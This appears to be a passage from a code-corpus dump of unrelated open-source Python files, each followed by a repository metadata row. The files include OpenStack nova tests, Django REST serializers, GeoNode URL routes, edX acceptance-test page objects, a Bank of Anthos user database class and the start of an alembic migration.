serial_request = """<?xml version="1.0" encoding="UTF-8"?>
<rebuild
xmlns="http://docs.openstack.org/compute/api/v1.1"
imageRef="http://localhost/images/1"
name=""/>"""
self.assertRaises(AttributeError,
self.deserializer.deserialize,
serial_request,
'action')
def test_rebuild_preserve_ephemeral_passed(self):
serial_request = """<?xml version="1.0" encoding="UTF-8"?>
<rebuild
xmlns="http://docs.openstack.org/compute/api/v1.1"
imageRef="http://localhost/images/1"
preserve_ephemeral="true"/>"""
request = self.deserializer.deserialize(serial_request, 'action')
expected = {
"rebuild": {
"imageRef": "http://localhost/images/1",
"preserve_ephemeral": True,
},
}
self.assertThat(request['body'], matchers.DictMatches(expected))
def test_corrupt_xml(self):
"""Should throw a 400 error on corrupt xml."""
self.assertRaises(
exception.MalformedRequestBody,
self.deserializer.deserialize,
utils.killer_xml_body())
| vmthunder/nova | nova/tests/api/openstack/compute/test_server_actions.py | Python | apache-2.0 | 60,337 | 0.000447 |
import json

from rest_framework import serializers
from taggit.models import Tag

from models import SurveyDraft
class WritableJSONField(serializers.Field):
    """Writable serializer field for JSON-backed model fields.

    The default JSONField serialization is read-only, and under Django 1.8
    it also emits the ``u`` prefix on strings, producing invalid JSON.
    This field accepts a JSON string on input and passes the already-decoded
    value straight through on output.

    Note: the original class body contained a second bare string literal
    (a dead statement, not part of the docstring); its content is folded
    into this docstring.
    """
    def __init__(self, **kwargs):
        # 'allow_blank' is not a serializers.Field kwarg, so pop it before
        # delegating; kept as an attribute for callers that inspect it.
        self.allow_blank = kwargs.pop('allow_blank', False)
        super(WritableJSONField, self).__init__(**kwargs)
    def to_internal_value(self, data):
        """Decode the incoming JSON string, or None when empty and optional.

        Raises serializers.ValidationError when the payload is not valid JSON.
        """
        if (not data) and (not self.required):
            return None
        else:
            try:
                # Requires the module-level `import json`.
                return json.loads(data)
            except Exception as e:
                raise serializers.ValidationError(
                    u'Unable to parse JSON: {}'.format(e))
    def to_representation(self, value):
        """Return the stored (already-decoded) value unchanged."""
        return value
class ListSurveyDraftSerializer(serializers.HyperlinkedModelSerializer):
    """Compact SurveyDraft representation for list endpoints (omits the form body)."""
    class Meta:
        model = SurveyDraft
        fields = ('id', 'name', 'asset_type', 'summary', 'date_modified', 'description')
    # 'summary' is stored as JSON; WritableJSONField makes it writable.
    summary = WritableJSONField(required=False)
class DetailSurveyDraftSerializer(serializers.HyperlinkedModelSerializer):
    """Full SurveyDraft representation including the form body and tag names."""
    # Read-only list of tag names, produced by get_tag_names below.
    tags = serializers.SerializerMethodField('get_tag_names')
    summary = WritableJSONField(required=False)
    class Meta:
        model = SurveyDraft
        fields = ('id', 'name', 'body', 'summary', 'date_modified', 'description', 'tags')
    def get_tag_names(self, obj):
        """Return the names of all tags attached to this draft."""
        return obj.tags.names()
class TagSerializer(serializers.HyperlinkedModelSerializer):
    """Tag serializer exposing a per-user usage count over question drafts."""
    count = serializers.SerializerMethodField()
    # Expose the Tag's 'name' column under the key 'label'.
    label = serializers.CharField(source='name')
    class Meta:
        model = Tag
        fields = ('id', 'label', 'count')
    def get_count(self, obj):
        """Count the requesting user's question-type drafts carrying this tag."""
        return SurveyDraft.objects.filter(tags__name__in=[obj.name])\
            .filter(user=self.context.get('request', None).user)\
            .filter(asset_type='question')\
            .count()
| onaio/dkobo | dkobo/koboform/serializers.py | Python | agpl-3.0 | 2,038 | 0.002944 |
from .util.deb import deb
from .util.nrange import nrange
from .cell import Cell
#F,e,Cursor
from .grid import spoint
# Module-level cursor position: None until scp() is first called, then an (x, y) tuple.
CURSOR_POS=None
def gcp(): #get cursor position
    """Return the current cursor position as an (x, y) tuple, or None if unset."""
    # No `global` statement needed: CURSOR_POS is only read here, never rebound.
    deb('gcp',CURSOR_POS)
    return CURSOR_POS
def scp(x,y):
    """Record (x, y) as the current cursor position in the module global."""
    # Logs the previous position alongside the new one.
    deb('scp',gcp(),x,y)
    # TODO: normalize coordinates in cursor()  (was an unused `cxc=0` placeholder)
    global CURSOR_POS
    CURSOR_POS=(x,y)
    # Sanity check: the global round-trips through gcp().
    assert (x,y)==gcp()
#todo cpget and cpset
# Public aliases: cpget/cpset mirror gcp/scp under more descriptive names.
cpget=gcp
cpset=scp
def cursor(HG,x,y,f,X,Y):
    """Draw a four-glyph cursor around cell (x, y) and return the updated grid.

    f supplies exactly four glyphs (left, up, right, down); X and Y are
    accepted for interface compatibility with callers but are not used.
    Side effect: records (x, y) as the current cursor position via scp().
    Cleanup: removed commented-out dead code and the redundant i=x / j=y
    aliases; behavior is unchanged.
    """
    deb('make an a cursor in the empty space around point in cell x,y',x,y)
    assert len(f)==4
    scp(x,y)
    cxl=Cell(f[0],0,0)
    cyu=Cell(f[1],0,0)
    cxr=Cell(f[2],0,0)
    cyd=Cell(f[3],0,0)
    HG=spoint(x-1,y,HG,cxl)
    HG=spoint(x,y-1,HG,cyu)
    HG=spoint(x+1,y,HG,cxr)
    HG=spoint(x,y+1,HG,cyd)
    return HG
def grid_cursor(HG,x,y,f,X,Y):
    """Thin wrapper around cursor(); kept for grid-oriented call sites."""
    return cursor(HG, x, y, f, X, Y)
def _clearcursor(HG):
    """Overwrite the four cursor glyphs around the stored position with '.' cells.

    Returns the grid unchanged when no cursor position has been recorded yet.
    """
    pos=gcp()
    # All four replacement cells share one blank '.' cell, as before.
    blank1=blank2=blank3=blank4=Cell('.',0,0)
    deb('clear a cursor in the empty space around point in cell x,y',pos)
    if not pos:return HG
    cx,cy=pos
    HG=spoint(cx-1,cy,HG,blank1)
    HG=spoint(cx,cy-1,HG,blank2)
    HG=spoint(cx+1,cy,HG,blank3)
    HG=spoint(cx,cy+1,HG,blank4)
    return HG
| e7dal/hexy | hexy/cursor.py | Python | gpl-3.0 | 1,100 | 0.128182 |
# -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2012 OpenPlans
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
from django.conf.urls.defaults import patterns, url
# Packages whose translations are served through Django's JavaScript i18n catalog view.
js_info_dict = {
    'packages': ('geonode.maps',),
}
# URL routes for map browsing, editing, download and embedding under /maps/.
# All view names resolve inside geonode.maps.views.
urlpatterns = patterns('geonode.maps.views',
    url(r'^$', 'map_list', name='maps_browse'),
    url(r'^tag/(?P<slug>[-\w]+?)/$', 'maps_tag', name='maps_browse_tag'),
    url(r'^new$', 'new_map', name="new_map"),
    url(r'^new/data$', 'new_map_json', name='new_map_json'),
    url(r'^(?P<mapid>\d+)$', 'map_detail', name='map_detail'),
    url(r'^(?P<mapid>\d+)/view$', 'map_view', name='map_view'),
    url(r'^(?P<mapid>\d+)/data$', 'map_json', name='map_json'),
    url(r'^(?P<mapid>\d+)/download$', 'map_download', name='map_download'),
    url(r'^(?P<mapid>\d+)/wmc$', 'map_wmc', name='map_wmc'),
    url(r'^(?P<mapid>\d+)/remove$', 'map_remove', name='map_remove'),
    url(r'^(?P<mapid>\d+)/metadata$', 'map_metadata', name='map_metadata'),
    url(r'^(?P<mapid>\d+)/embed$', 'map_embed', name='map_embed'),
    url(r'^(?P<mapid>\d+)/permissions$', 'map_permissions', name='map_permissions'),
    url(r'^(?P<mapid>\d+)/thumbnail$', 'map_thumbnail', name='map_thumbnail'),
    url(r'^check/$', 'map_download_check', name='map_download_check'),
    # NOTE(review): the name 'map_embed' is also used for the per-map embed
    # route above; duplicate URL names make reverse() ambiguous — confirm intended.
    url(r'^embed/$', 'map_embed', name='map_embed'),
    url(r'^(?P<layername>[^/]*)/attributes', 'maplayer_attributes', name='maplayer_attributes'),
    #url(r'^change-poc/(?P<ids>\w+)$', 'change_poc', name='maps_change_poc'),
)
| frippe12573/geonode | geonode/maps/urls.py | Python | gpl-3.0 | 2,230 | 0.001794 |
# Copyright 2019-2020 Camptocamp SA
# Copyright 2015 Mathias Neef copadoMEDIA UG
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
# Odoo module manifest for the Swiss country-states (cantons) localisation addon.
{
    "name": "Switzerland Country States",
    "category": "Localisation",
    "summary": "",
    "version": "14.0.1.0.0",
    # NOTE(review): implicit string concatenation yields
    # "copado MEDIA UG,Odoo Community Association (OCA)" — confirm a space
    # after the comma was not intended.
    "author": "copado MEDIA UG," "Odoo Community Association (OCA)",
    "website": "https://github.com/OCA/l10n-switzerland",
    "license": "AGPL-3",
    # Only depends on base; the canton records are shipped as data.
    "depends": ["base"],
    "data": ["data/res_country_states.xml"],
}
| OCA/l10n-switzerland | l10n_ch_states/__manifest__.py | Python | agpl-3.0 | 493 | 0 |
"""
Courseware page.
"""
from bok_choy.page_object import PageObject, unguarded
from bok_choy.promise import EmptyPromise
import re
from selenium.webdriver.common.action_chains import ActionChains
from common.test.acceptance.pages.lms.bookmarks import BookmarksPage
from common.test.acceptance.pages.lms.course_page import CoursePage
class CoursewarePage(CoursePage):
    """
    Course info.

    Page object for the LMS courseware view: sequence navigation, rendered
    xblock content, timed/proctored exam controls, and bookmarks.
    """
    url_path = "courseware/"
    # Matches every rendered xblock inside a unit (vertical).
    xblock_component_selector = '.vert .xblock'
    # TODO: TNL-6546: Remove sidebar selectors
    section_selector = '.chapter'
    subsection_selector = '.chapter-content-container a'
    def __init__(self, browser, course_id):
        """Initialize the page and attach a CourseNavPage helper as self.nav."""
        super(CoursewarePage, self).__init__(browser, course_id)
        self.nav = CourseNavPage(browser, self)
    def is_browser_on_page(self):
        """Return True when the courseware content container is present."""
        return self.q(css='.course-content').present
    @property
    def chapter_count_in_navigation(self):
        """
        Returns count of chapters available on LHS navigation.
        """
        return len(self.q(css='nav.course-navigation a.chapter'))
    # TODO: TNL-6546: Remove and find callers.
    @property
    def num_sections(self):
        """
        Return the number of sections in the sidebar on the page
        """
        return len(self.q(css=self.section_selector))
    # TODO: TNL-6546: Remove and find callers.
    @property
    def num_subsections(self):
        """
        Return the number of subsections in the sidebar on the page, including in collapsed sections
        """
        return len(self.q(css=self.subsection_selector))
    @property
    def xblock_components(self):
        """
        Return the xblock components within the unit on the page.
        """
        return self.q(css=self.xblock_component_selector)
    @property
    def num_xblock_components(self):
        """
        Return the number of rendered xblocks within the unit on the page
        """
        return len(self.xblock_components)
    def xblock_component_type(self, index=0):
        """
        Extract rendered xblock component type.
        Returns:
            str: xblock module type
            index: which xblock to query, where the index is the vertical display within the page
                (default is 0)
        """
        return self.q(css=self.xblock_component_selector).attrs('data-block-type')[index]
    def xblock_component_html_content(self, index=0):
        """
        Extract rendered xblock component html content.
        Returns:
            str: xblock module html content
            index: which xblock to query, where the index is the vertical display within the page
                (default is 0)
        """
        # When Student Notes feature is enabled, it looks for the content inside
        # `.edx-notes-wrapper-content` element (Otherwise, you will get an
        # additional html related to Student Notes).
        element = self.q(css='{} .edx-notes-wrapper-content'.format(self.xblock_component_selector))
        if element.first:
            return element.attrs('innerHTML')[index].strip()
        else:
            return self.q(css=self.xblock_component_selector).attrs('innerHTML')[index].strip()
    def verify_tooltips_displayed(self):
        """
        Verify that all sequence navigation bar tooltips are being displayed upon mouse hover.
        If a tooltip does not appear, raise a BrokenPromise.
        """
        for index, tab in enumerate(self.q(css='#sequence-list > li')):
            # Hover over each tab to trigger its tooltip.
            ActionChains(self.browser).move_to_element(tab).perform()
            self.wait_for_element_visibility(
                '#tab_{index} > .sequence-tooltip'.format(index=index),
                'Tab {index} should appear'.format(index=index)
            )
    @property
    def course_license(self):
        """
        Returns the course license text, if present. Else returns None.
        """
        element = self.q(css="#content .container-footer .course-license")
        if element.is_present():
            return element.text[0]
        return None
    def go_to_sequential_position(self, sequential_position):
        """
        Within a section/subsection navigate to the sequential position specified by `sequential_position`.
        Arguments:
            sequential_position (int): position in sequential bar
        """
        def is_at_new_position():
            """
            Returns whether the specified tab has become active. It is defensive
            against the case where the page is still being loaded.
            """
            active_tab = self._active_sequence_tab
            try:
                return active_tab and int(active_tab.attrs('data-element')[0]) == sequential_position
            except IndexError:
                return False
        # Tab ids are zero-based while sequential_position is one-based.
        sequential_position_css = '#sequence-list #tab_{0}'.format(sequential_position - 1)
        self.q(css=sequential_position_css).first.click()
        EmptyPromise(is_at_new_position, "Position navigation fulfilled").fulfill()
    @property
    def sequential_position(self):
        """
        Returns the position of the active tab in the sequence.
        """
        # Tab ids look like 'tab_3'; the numeric suffix is the position.
        tab_id = self._active_sequence_tab.attrs('id')[0]
        return int(tab_id.split('_')[1])
    @property
    def _active_sequence_tab(self):  # pylint: disable=missing-docstring
        return self.q(css='#sequence-list .nav-item.active')
    @property
    def is_next_button_enabled(self):  # pylint: disable=missing-docstring
        return not self.q(css='.sequence-nav > .sequence-nav-button.button-next.disabled').is_present()
    @property
    def is_previous_button_enabled(self):  # pylint: disable=missing-docstring
        return not self.q(css='.sequence-nav > .sequence-nav-button.button-previous.disabled').is_present()
    def click_next_button_on_top(self):  # pylint: disable=missing-docstring
        self._click_navigation_button('sequence-nav', 'button-next')
    def click_next_button_on_bottom(self):  # pylint: disable=missing-docstring
        self._click_navigation_button('sequence-bottom', 'button-next')
    def click_previous_button_on_top(self):  # pylint: disable=missing-docstring
        self._click_navigation_button('sequence-nav', 'button-previous')
    def click_previous_button_on_bottom(self):  # pylint: disable=missing-docstring
        self._click_navigation_button('sequence-bottom', 'button-previous')
    def _click_navigation_button(self, top_or_bottom_class, next_or_previous_class):
        """
        Clicks the navigation button, given the respective CSS classes.
        """
        previous_tab_id = self._active_sequence_tab.attrs('data-id')[0]
        def is_at_new_tab_id():
            """
            Returns whether the active tab has changed. It is defensive
            against the case where the page is still being loaded.
            """
            active_tab = self._active_sequence_tab
            try:
                return active_tab and previous_tab_id != active_tab.attrs('data-id')[0]
            except IndexError:
                return False
        self.q(
            css='.{} > .sequence-nav-button.{}'.format(top_or_bottom_class, next_or_previous_class)
        ).first.click()
        EmptyPromise(is_at_new_tab_id, "Button navigation fulfilled").fulfill()
    @property
    def can_start_proctored_exam(self):
        """
        Returns True if the timed/proctored exam timer bar is visible on the courseware.
        """
        return self.q(css='button.start-timed-exam[data-start-immediately="false"]').is_present()
    def start_timed_exam(self):
        """
        clicks the start this timed exam link
        """
        self.q(css=".xblock-student_view .timed-exam .start-timed-exam").first.click()
        self.wait_for_element_presence(".proctored_exam_status .exam-timer", "Timer bar")
    def stop_timed_exam(self):
        """
        clicks the stop this timed exam link
        """
        self.q(css=".proctored_exam_status button.exam-button-turn-in-exam").first.click()
        self.wait_for_element_absence(".proctored_exam_status .exam-button-turn-in-exam", "End Exam Button gone")
        self.wait_for_element_presence("button[name='submit-proctored-exam']", "Submit Exam Button")
        self.q(css="button[name='submit-proctored-exam']").first.click()
        self.wait_for_element_absence(".proctored_exam_status .exam-timer", "Timer bar")
    def start_proctored_exam(self):
        """
        clicks the start this timed exam link
        """
        self.q(css='button.start-timed-exam[data-start-immediately="false"]').first.click()
        # Wait for the unique exam code to appear.
        # self.wait_for_element_presence(".proctored-exam-code", "unique exam code")
    def has_submitted_exam_message(self):
        """
        Returns whether the "you have submitted your exam" message is present.
        This being true implies "the exam contents and results are hidden".
        """
        return self.q(css="div.proctored-exam.completed").visible
    def content_hidden_past_due_date(self):
        """
        Returns whether the "the due date for this ___ has passed" message is present.
        ___ is the type of the hidden content, and defaults to subsection.
        This being true implies "the ___ contents are hidden because their due date has passed".
        """
        message = "this assignment is no longer available"
        if self.q(css="div.seq_content").is_present():
            return False
        for html in self.q(css="div.hidden-content").html:
            if message in html:
                return True
        return False
    @property
    def entrance_exam_message_selector(self):
        """
        Return the entrance exam status message selector on the top of courseware page.
        """
        return self.q(css='#content .container section.course-content .sequential-status-message')
    def has_entrance_exam_message(self):
        """
        Returns boolean indicating presence entrance exam status message container div.
        """
        return self.entrance_exam_message_selector.is_present()
    def has_passed_message(self):
        """
        Returns boolean indicating presence of passed message.
        """
        return self.entrance_exam_message_selector.is_present() \
            and "You have passed the entrance exam" in self.entrance_exam_message_selector.text[0]
    def has_banner(self):
        """
        Returns boolean indicating presence of banner
        """
        return self.q(css='.pattern-library-shim').is_present()
    @property
    def is_timer_bar_present(self):
        """
        Returns True if the timed/proctored exam timer bar is visible on the courseware.
        """
        return self.q(css=".proctored_exam_status .exam-timer").is_present()
    def active_usage_id(self):
        """ Returns the usage id of active sequence item """
        # Filter nav items down to the one carrying the 'active' class,
        # then read its data-id attribute.
        get_active = lambda el: 'active' in el.get_attribute('class')
        attribute_value = lambda el: el.get_attribute('data-id')
        return self.q(css='#sequence-list .nav-item').filter(get_active).map(attribute_value).results[0]
    @property
    def breadcrumb(self):
        """ Return the course tree breadcrumb shown above the sequential bar """
        return [part.strip() for part in self.q(css='.path .position').text[0].split('>')]
    def unit_title_visible(self):
        """ Check if unit title is visible """
        return self.q(css='.unit-title').visible
    def bookmark_button_visible(self):
        """ Check if bookmark button is visible """
        EmptyPromise(lambda: self.q(css='.bookmark-button').visible, "Bookmark button visible").fulfill()
        return True
    @property
    def bookmark_button_state(self):
        """ Return `bookmarked` if button is in bookmarked state else '' """
        return 'bookmarked' if self.q(css='.bookmark-button.bookmarked').present else ''
    @property
    def bookmark_icon_visible(self):
        """ Check if bookmark icon is visible on active sequence nav item """
        return self.q(css='.active .bookmark-icon').visible
    def click_bookmark_unit_button(self):
        """ Bookmark a unit by clicking on Bookmark button """
        previous_state = self.bookmark_button_state
        self.q(css='.bookmark-button').first.click()
        EmptyPromise(lambda: self.bookmark_button_state != previous_state, "Bookmark button toggled").fulfill()
    # TODO: TNL-6546: Remove this helper function
    def click_bookmarks_button(self):
        """ Click on Bookmarks button """
        self.q(css='.bookmarks-list-button').first.click()
        bookmarks_page = BookmarksPage(self.browser, self.course_id)
        bookmarks_page.visit()
class CoursewareSequentialTabPage(CoursePage):
    """
    Courseware Sequential page

    Page object for a single sequential tab addressed directly by
    chapter / subsection / position in the URL.
    """
    def __init__(self, browser, course_id, chapter, subsection, position):
        """Build the courseware URL for the given chapter, subsection and position."""
        super(CoursewareSequentialTabPage, self).__init__(browser, course_id)
        self.url_path = "courseware/{}/{}/{}".format(chapter, subsection, position)
    def is_browser_on_page(self):
        """Return True when the sequence navigation wrapper is present."""
        return self.q(css='nav.sequence-list-wrapper').present
    def get_selected_tab_content(self):
        """
        return the body of the sequential currently selected
        """
        return self.q(css='#seq_content .xblock').text[0]
class CourseNavPage(PageObject):
    """
    Handles navigation on the courseware pages, including sequence navigation and
    breadcrumbs.
    """
    url = None
    def __init__(self, browser, parent_page):
        """Attach to `parent_page` (a CoursePage) whose browser state we navigate."""
        super(CourseNavPage, self).__init__(browser)
        self.parent_page = parent_page
        # TODO: TNL-6546: Remove the following
        self.unified_course_view = False
    def is_browser_on_page(self):
        """Delegate the page check to the parent courseware page."""
        return self.parent_page.is_browser_on_page
    # TODO: TNL-6546: Remove method, outline no longer on courseware page
    @property
    def sections(self):
        """
        Return a dictionary representation of sections and subsections.
        Example:
            {
                'Introduction': ['Course Overview'],
                'Week 1': ['Lesson 1', 'Lesson 2', 'Homework']
                'Final Exam': ['Final Exam']
            }
        You can use these titles in `go_to_section` to navigate to the section.
        """
        # Dict to store the result
        nav_dict = dict()
        section_titles = self._section_titles()
        # Get the section titles for each chapter
        for sec_index, sec_title in enumerate(section_titles):
            if len(section_titles) < 1:
                self.warning("Could not find subsections for '{0}'".format(sec_title))
            else:
                # Add one to convert list index (starts at 0) to CSS index (starts at 1)
                nav_dict[sec_title] = self._subsection_titles(sec_index + 1)
        return nav_dict
    @property
    def sequence_items(self):
        """
        Return a list of sequence items on the page.
        Sequence items are one level below subsections in the course nav.
        Example return value:
            ['Chemical Bonds Video', 'Practice Problems', 'Homework']
        """
        seq_css = 'ol#sequence-list>li>.nav-item>.sequence-tooltip'
        return self.q(css=seq_css).map(self._clean_seq_titles).results
    # TODO: TNL-6546: Remove method, outline no longer on courseware page
    def go_to_section(self, section_title, subsection_title):
        """
        Go to the section in the courseware.
        Every section must have at least one subsection, so specify
        both the section and subsection title.
        Example:
            go_to_section("Week 1", "Lesson 1")
        """
        # For test stability, disable JQuery animations (opening / closing menus)
        self.browser.execute_script("jQuery.fx.off = true;")
        # Get the section by index
        try:
            sec_index = self._section_titles().index(section_title)
        except ValueError:
            self.warning("Could not find section '{0}'".format(section_title))
            return
        # Click the section to ensure it's open (no harm in clicking twice if it's already open)
        # Add one to convert from list index to CSS index
        section_css = '.course-navigation .chapter:nth-of-type({0})'.format(sec_index + 1)
        self.q(css=section_css).first.click()
        # Get the subsection by index
        try:
            subsec_index = self._subsection_titles(sec_index + 1).index(subsection_title)
        except ValueError:
            msg = "Could not find subsection '{0}' in section '{1}'".format(subsection_title, section_title)
            self.warning(msg)
            return
        # Convert list indices (start at zero) to CSS indices (start at 1)
        subsection_css = (
            ".course-navigation .chapter-content-container:nth-of-type({0}) "
            ".menu-item:nth-of-type({1})"
        ).format(sec_index + 1, subsec_index + 1)
        # Click the subsection and ensure that the page finishes reloading
        self.q(css=subsection_css).first.click()
        self._on_section_promise(section_title, subsection_title).fulfill()
    def go_to_vertical(self, vertical_title):
        """
        Within a section/subsection, navigate to the vertical with `vertical_title`.
        """
        # Get the index of the item in the sequence
        all_items = self.sequence_items
        try:
            seq_index = all_items.index(vertical_title)
        except ValueError:
            msg = "Could not find sequential '{0}'.  Available sequentials: [{1}]".format(
                vertical_title, ", ".join(all_items)
            )
            self.warning(msg)
        else:
            # Click on the sequence item at the correct index
            # Convert the list index (starts at 0) to a CSS index (starts at 1)
            seq_css = "ol#sequence-list>li:nth-of-type({0})>.nav-item".format(seq_index + 1)
            self.q(css=seq_css).first.click()
            # Click triggers an ajax event
            self.wait_for_ajax()
    # TODO: TNL-6546: Remove method, outline no longer on courseware page
    def _section_titles(self):
        """
        Return a list of all section titles on the page.
        """
        chapter_css = '.course-navigation .chapter .group-heading'
        return self.q(css=chapter_css).map(lambda el: el.text.strip()).results
    # TODO: TNL-6546: Remove method, outline no longer on courseware page
    def _subsection_titles(self, section_index):
        """
        Return a list of all subsection titles on the page
        for the section at index `section_index` (starts at 1).
        """
        # Retrieve the subsection title for the section
        # Add one to the list index to get the CSS index, which starts at one
        subsection_css = (
            ".course-navigation .chapter-content-container:nth-of-type({0}) "
            ".menu-item a p:nth-of-type(1)"
        ).format(section_index)
        # If the element is visible, we can get its text directly
        # Otherwise, we need to get the HTML
        # It *would* make sense to always get the HTML,
        # but unfortunately the open tab has some child <span> tags
        # that we don't want.
        return self.q(
            css=subsection_css
        ).map(
            lambda el: el.text.strip().split('\n')[0] if el.is_displayed() else el.get_attribute('innerHTML').strip()
        ).results
    # TODO: TNL-6546: Remove method, outline no longer on courseware page
    def _on_section_promise(self, section_title, subsection_title):
        """
        Return a `Promise` that is fulfilled when the user is on
        the correct section and subsection.
        """
        desc = "currently at section '{0}' and subsection '{1}'".format(section_title, subsection_title)
        return EmptyPromise(
            lambda: self.is_on_section(section_title, subsection_title), desc
        )
    def go_to_outline(self):
        """
        Navigates using breadcrumb to the course outline on the course home page.
        Returns CourseHomePage page object.
        """
        # To avoid circular dependency, importing inside the function
        from common.test.acceptance.pages.lms.course_home import CourseHomePage
        course_home_page = CourseHomePage(self.browser, self.parent_page.course_id)
        self.q(css='.path a').click()
        course_home_page.wait_for_page()
        return course_home_page
    @unguarded
    def is_on_section(self, section_title, subsection_title):
        """
        Return a boolean indicating whether the user is on the section and subsection
        with the specified titles.
        """
        # TODO: TNL-6546: Remove if/else; always use unified_course_view version (if)
        if self.unified_course_view:
            # breadcrumb location of form: "SECTION_TITLE > SUBSECTION_TITLE > SEQUENTIAL_TITLE"
            bread_crumb_current = self.q(css='.position').text
            if len(bread_crumb_current) != 1:
                self.warning("Could not find the current bread crumb with section and subsection.")
                return False
            return bread_crumb_current[0].strip().startswith(section_title + ' > ' + subsection_title + ' > ')
        else:
            # This assumes that the currently expanded section is the one we're on
            # That's true right after we click the section/subsection, but not true in general
            # (the user could go to a section, then expand another tab).
            current_section_list = self.q(css='.course-navigation .chapter.is-open .group-heading').text
            current_subsection_list = self.q(css='.course-navigation .chapter-content-container .menu-item.active a p').text
            if len(current_section_list) == 0:
                self.warning("Could not find the current section")
                return False
            elif len(current_subsection_list) == 0:
                self.warning("Could not find current subsection")
                return False
            else:
                return (
                    current_section_list[0].strip() == section_title and
                    current_subsection_list[0].strip().split('\n')[0] == subsection_title
                )
    # Regular expression to remove HTML span tags from a string
    REMOVE_SPAN_TAG_RE = re.compile(r'</span>(.+)<span')
    def _clean_seq_titles(self, element):
        """
        Clean HTML of sequence titles, stripping out span tags and returning the first line.
        """
        return self.REMOVE_SPAN_TAG_RE.search(element.get_attribute('innerHTML')).groups()[0].strip()
    # TODO: TNL-6546: Remove. This is no longer needed.
    @property
    def active_subsection_url(self):
        """
        return the url of the active subsection in the left nav
        """
        return self.q(css='.chapter-content-container .menu-item.active a').attrs('href')[0]
    # TODO: TNL-6546: Remove all references to self.unified_course_view
    # TODO: TNL-6546: Remove the following function
    def visit_unified_course_view(self):
        """Reload the current page with the unified course view query flag set."""
        # use unified_course_view version of the nav
        self.unified_course_view = True
        # reload the same page with the unified course view
        self.browser.get(self.browser.current_url + "&unified_course_view=1")
        self.wait_for_page()
| romain-li/edx-platform | common/test/acceptance/pages/lms/courseware.py | Python | agpl-3.0 | 23,445 | 0.003156 |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
db manages interactions with the underlying database
"""
import logging
import random
from sqlalchemy import create_engine, MetaData, Table, Column, String, Date, LargeBinary
from opentelemetry.instrumentation.sqlalchemy import SQLAlchemyInstrumentor
class UserDb:
    """
    UserDb provides a set of helper functions over SQLAlchemy
    to handle db operations for userservice
    """
    def __init__(self, uri, logger=logging):
        """Create the engine, declare the users table, and enable tracing.

        Args:
            uri: SQLAlchemy database URI.
            logger: logger-like object used for debug output (defaults to
                the logging module itself).
        """
        self.engine = create_engine(uri)
        self.logger = logger
        self.users_table = Table(
            'users',
            MetaData(self.engine),
            Column('accountid', String, primary_key=True),
            Column('username', String, unique=True, nullable=False),
            Column('passhash', LargeBinary, nullable=False),
            Column('firstname', String, nullable=False),
            Column('lastname', String, nullable=False),
            Column('birthday', Date, nullable=False),
            Column('timezone', String, nullable=False),
            Column('address', String, nullable=False),
            Column('state', String, nullable=False),
            Column('zip', String, nullable=False),
            Column('ssn', String, nullable=False),
        )
        # Set up tracing autoinstrumentation for sqlalchemy
        SQLAlchemyInstrumentor().instrument(
            engine=self.engine,
            service='users',
        )
    def add_user(self, user):
        """Add a user to the database.
        Params: user - a key/value dict of attributes describing a new user
                    {'username': username, 'password': password, ...}
        Raises: SQLAlchemyError if there was an issue with the database
        """
        statement = self.users_table.insert().values(user)
        self.logger.debug('QUERY: %s', str(statement))
        with self.engine.connect() as conn:
            conn.execute(statement)
    def generate_accountid(self):
        """Generates a globally unique alphanumerical accountid."""
        self.logger.debug('Generating an account ID')
        accountid = None
        with self.engine.connect() as conn:
            while accountid is None:
                # 10-digit ID in [10**9, 10**10 - 1]. Integer bounds are
                # required: float arguments to randint were deprecated in
                # Python 3.10 and raise a TypeError on 3.12+.
                accountid = str(random.randint(10**9, 10**10 - 1))
                statement = self.users_table.select().where(
                    self.users_table.c.accountid == accountid
                )
                self.logger.debug('QUERY: %s', str(statement))
                result = conn.execute(statement).first()
                # If there already exists an account, try again.
                if result is not None:
                    accountid = None
                    self.logger.debug('RESULT: account ID already exists. Trying again')
        self.logger.debug('RESULT: account ID generated.')
        return accountid
    def get_user(self, username):
        """Get user data for the specified username.
        Params: username - the username of the user
        Return: a key/value dict of user attributes,
                {'username': username, 'accountid': accountid, ...}
                or None if that user does not exist
        Raises: SQLAlchemyError if there was an issue with the database
        """
        statement = self.users_table.select().where(self.users_table.c.username == username)
        self.logger.debug('QUERY: %s', str(statement))
        with self.engine.connect() as conn:
            result = conn.execute(statement).first()
        self.logger.debug('RESULT: fetched user data for %s', username)
        return dict(result) if result is not None else None
| GoogleCloudPlatform/bank-of-anthos | src/userservice/db.py | Python | apache-2.0 | 4,158 | 0.000962 |
# Copyright 2021 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""add device reservation
Revision ID: 42c7fd6e792e
Revises: 02e2f2186d98
Create Date: 2021-06-22 15:27:00.239725
"""
# revision identifiers, used by Alembic.
revision = '42c7fd6e792e'
down_revision = '02e2f2186d98'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
def upgrade():
    """Create the device-reservation tables.
    Adds the ``devices``, ``device_extra_capabilities``,
    ``device_allocations`` and ``device_reservations`` tables, and makes
    ``instance_reservations.affinity`` NOT NULL.
    """
    # ### commands auto generated by Alembic - please adjust! ###
    # Inventory of reservable devices
    op.create_table('devices',
                    sa.Column('created_at', sa.DateTime(), nullable=True),
